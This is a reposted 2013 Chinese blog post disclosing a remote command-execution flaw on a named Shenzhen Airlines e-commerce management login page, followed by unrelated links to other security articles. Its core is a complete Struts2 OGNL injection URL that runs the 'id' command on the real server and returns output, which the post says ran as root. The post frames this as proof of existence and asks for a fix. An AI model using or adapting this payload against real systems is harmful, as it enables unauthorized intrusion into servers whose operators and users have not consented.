深圳航空安全漏洞# 某分站命令执行

转载 2013年12月05日 08:38:59
问题站点:尊鹏商城管理平台 http://eshop.shenzhenair.com/szair/mc/login.jsp
这里只验证漏洞的存在性,并未深入,请及时修补


root权限

https://eshop.shenzhenair.com/szair/mc/rbac_login!signin.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(%22id%22)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
本文固定链接: http://www.ryhxl.com/44.html

欧洲航空安全局希望劝阻把伪代码用作低层需求

欧洲航空安全局希望劝阻把伪代码用作低层需求   作者:European Aviation Safety Agency(EASA) 原文:EASA Proposed CM No.: EASA Pr...

为马航MH370祈福!大数据告诉你真实的航空安全现状

哪怕你们一直失踪不见,也不想结果为坠毁遇难。多想能如电影桥段那般,在某天风和日丽的早晨,你们的音频突然出现,说你们是与马来西亚航空总台失去联系的MH370,说你们只是去平行世界转了一圈。如韩寒所说,“...

OWASP十大安全漏洞解析

  • 2017年11月08日 09:43
  • 1.28MB
  • 下载

Android中的组件安全漏洞介绍和检测

首先我们介绍下我们常见的Android的activity组件, Activity是Android四大组件之一,它用于展示界面。Activity是一个应用程序组件,提供一个屏幕,用户可以用来交互为了完成...

openoffice安全漏洞修复

  • 2012年12月16日 10:20
  • 338KB
  • 下载

常见安全漏洞及整改建议[备忘]

常见安全漏洞与整改方案
  • signmem
  • signmem
  • 2013年12月27日 20:21
  • 18685

Android webView安全漏洞解决

  • 2016年10月13日 11:33
  • 27.72MB
  • 下载

Struts2 安全漏洞解决方法

  • 2014年09月15日 09:30
  • 38KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深圳航空安全漏洞# 某分站命令执行
举报原因:
原因补充:

(最多只允许输入30个字)